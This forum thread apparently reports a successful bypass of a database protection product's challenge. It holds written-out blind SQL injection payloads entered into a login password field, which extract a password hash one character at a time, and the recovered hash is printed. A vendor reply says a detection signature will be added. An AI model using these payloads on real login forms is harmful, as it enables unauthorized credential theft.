YYEEEESSSS! I'l do it! (2houres)

2 replies
eLWAux
eLWAux's picture
Joined: 08/02/2008
User offline. Last seen 1 year 49 weeks ago.

name: admin
password: blabla') OR ascii(substring(pwd,1,1))>('50 - (+)
password: blabla') OR ascii(substring(pwd,1,1))<('52 - (+)
password: blabla') OR ascii(substring(pwd,1,1))=('52 -(-)
password: password: blabla') OR ascii(substring(pwd,1,1))=('51 - 2 (+)
пfirst symbol: 2
blabla') OR ascii(substring(pwd,2,1)).. secont symbol ....
etc..
in the end:37fa265330ad83eaa879efb1e2db6380896cf639
SHA('pwd')=37fa265330ad83eaa879efb1e2db6380896cf639 its TRUE!!!

YEEEEESSSS!
icq: 354 - 345 - 367

yuli
yuli's picture
Joined: 01/30/2008
User offline. Last seen 2 days 2 hours ago.

Hi eLWAux

Thank you for your email!!!

I will add custom signature for substring() function as a one that can be used to brute force database contents. The fix will be available in the next application release.

Thanks again,
Yuli

enatefox
enatefox's picture
Joined: 08/21/2008
User offline. Last seen 1 year 48 weeks ago.

I registered just to ask: ascii(substring(pwd,1,1))=('51 - 2 (+)

I can't find anything on what's after the '=', what's the function and what is the plus sign doing?

Back to top